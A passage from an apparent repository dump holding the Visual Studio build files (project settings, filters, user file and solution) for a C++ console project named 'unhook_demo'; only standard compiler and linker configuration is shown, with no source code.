</ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" 
Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <PropertyGroup Label=\"UserMacros\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <LinkIncremental>true</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <LinkIncremental>true</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <LinkIncremental>false</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <LinkIncremental>false</LinkIncremental>\r\n  </PropertyGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <ClCompile>\r\n      <PrecompiledHeader>\r\n      </PrecompiledHeader>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <Optimization>Disabled</Optimization>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <ClCompile>\r\n      <PrecompiledHeader>\r\n      </PrecompiledHeader>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <Optimization>Disabled</Optimization>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n   
 </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <ClCompile>\r\n      <PrecompiledHeader>\r\n      </PrecompiledHeader>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <Optimization>MaxSpeed</Optimization>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <ClCompile>\r\n      <PrecompiledHeader>\r\n      </PrecompiledHeader>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <Optimization>MaxSpeed</Optimization>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"unhook_demo.cpp\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n  
  <ClInclude Include=\"Header.h\" />\r\n  </ItemGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\r\n  <ImportGroup Label=\"ExtensionTargets\">\r\n  </ImportGroup>\r\n</Project>"
  },
  {
    "path": "demo6/unhook_demo/unhook_demo.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup>\r\n    <Filter Include=\"Source Files\">\r\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\r\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"Header Files\">\r\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\r\n      <Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"Resource Files\">\r\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\r\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\r\n    </Filter>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"unhook_demo.cpp\">\r\n      <Filter>Source Files</Filter>\r\n    </ClCompile>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClInclude Include=\"Header.h\">\r\n      <Filter>Header Files</Filter>\r\n    </ClInclude>\r\n  </ItemGroup>\r\n</Project>"
  },
  {
    "path": "demo6/unhook_demo/unhook_demo.vcxproj.user",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <PropertyGroup />\r\n</Project>"
  },
  {
    "path": "demo6/unhook_demo.sln",
    "content": "﻿\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.28729.10\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"unhook_demo\", \"unhook_demo\\unhook_demo.vcxproj\", \"{D7F4E23F-325F-4C05-9FD9-5FE851B1A34D}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|x64 = Debug|x64\r\n\t\tDebug|x86 = Debug|x86\r\n\t\tRelease|x64 = Release|x64\r\n\t\tRelease|x86 = Release|x86\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{D7F4E23F-325F-4C05-9FD9-5FE851B1A34D}.Debug|x64.ActiveCfg = Debug|x64\r\n\t\t{D7F4E23F-325F-4C05-9FD9-5FE851B1A34D}.Debug|x64.Build.0 = Debug|x64\r\n\t\t{D7F4E23F-325F-4C05-9FD9-5FE851B1A34D}.Debug|x86.ActiveCfg = Debug|Win32\r\n\t\t{D7F4E23F-325F-4C05-9FD9-5FE851B1A34D}.Debug|x86.Build.0 = Debug|Win32\r\n\t\t{D7F4E23F-325F-4C05-9FD9-5FE851B1A34D}.Release|x64.ActiveCfg = Release|x64\r\n\t\t{D7F4E23F-325F-4C05-9FD9-5FE851B1A34D}.Release|x64.Build.0 = Release|x64\r\n\t\t{D7F4E23F-325F-4C05-9FD9-5FE851B1A34D}.Release|x86.ActiveCfg = Release|Win32\r\n\t\t{D7F4E23F-325F-4C05-9FD9-5FE851B1A34D}.Release|x86.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {81617172-DABD-4D8C-9698-CF770298517A}\r\n\tEndGlobalSection\r\nEndGlobal\r\n"
  }
]